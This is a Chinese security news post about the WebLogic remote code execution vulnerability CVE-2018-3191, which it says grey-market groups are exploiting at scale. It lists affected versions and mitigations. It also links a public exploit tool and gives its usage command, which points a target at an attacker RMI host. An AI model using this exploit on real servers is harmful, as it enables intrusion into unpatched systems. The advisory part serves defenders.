一大波肉鸡在路上!CVE-2018-3191已被灰产做成批量攻击工具,-一大波肉鸡在路上!CVE-2018-3191已被灰产做成批量攻击工具-华盟网

一大波肉鸡在路上!CVE-2018-3191已被灰产做成批量攻击工具,

华盟学院山东省第二期线下学习计划

1.1背景

北京时间10月17日,Oracle官方发布的10月关键补丁更新CPU(重要补丁更新)中修复了一个高危的WebLogic远程代码执行漏洞(CVE-2018-3191)。该漏洞允许未经身份验证的攻击网络服务器被攻击者接受,从而造成远程代码执行。这个漏洞由Matthias Kaiser,loopx9,李正东申报通过T3协议网络访问并破坏易受攻击的WebLogic Server,成功的漏洞利用可导致。

有人已经复现成功,来源jas502n的朋友圈图片

一大波肉鸡在路上!CVE-2018-3191已被灰产做成批量攻击工具,

一大波肉鸡在路上!CVE-2018-3191已被灰产做成批量攻击工具,

而且发现已经被灰产写成批量入侵工具,还在服务器上跑着呢!

一大波肉鸡在路上!CVE-2018-3191已被灰产做成批量攻击工具,

所以呢,有一大波肉鸡在路上,如果你不想成为肉鸡,尽快修复!

1.2漏洞编号

CVE-2018-3191

1.3漏洞等级

高危

二、修复建议

2.1受影响版本

WebLogic 10.3.6.0

WebLogic 12.1.3.0

WebLogic 12.2.1.2

WebLogic 12.2.1.3

2.2漏洞检测

检查WebLogic的版本号是否为受影响版本。

检查是否开启了WebLogic的T3服务。

2.3解决方案

Oracle官方已经在本次的关键补丁更新(CPU)中修复了该漏洞,强烈建议受影响的用户尽快升级更新进行防护。

注:Oracle官方补丁需要用户持有正版软件的许可账号,使用该账号登陆https://support.oracle.com后,可以下载最新补丁。

1.过滤T3协议

2.设置Nginx反向代理

3.升级到最新JDK 

JEP290(JDK8u121,7u131,6u141)

工具指定要带着的,要不然留言会骂死华盟君的,

https://github.com/voidfyoo/CVE-2018-3191/releases

https://github.com/voidfyoo/CVE-2018-3191

用法

java -jar weblogic-spring-jndi.jar <jndi_address>

例如:

java -jar weblogic-spring-jndi.jar rmi://192.168.1.1:1099/Exp

笔记

weblogic-spring-jndi-12.2.1.3.jar 对于weblogic:

  • 12.2.1.3

weblogic-spring-jndi-10.3.6.0.jar 对于weblogic:

  • 10.3.6.0

  • 12.2.1.0

  • 12.1.3.0

  • www.idc126.com

    12.2.1.1

一大波肉鸡在路上!CVE-2018-3191已被灰产做成批量攻击工具,

要不然再喂肥之后再杀?

一大波肉鸡在路上!CVE-2018-3191已被灰产做成批量攻击工具,

本文由 华盟网 作者:congtou 发表,其版权均为 华盟网 所有,文章内容系作者个人观点,不代表 华盟网 对观点赞同或支持。如需转载,请注明文章来源。
0

发表评论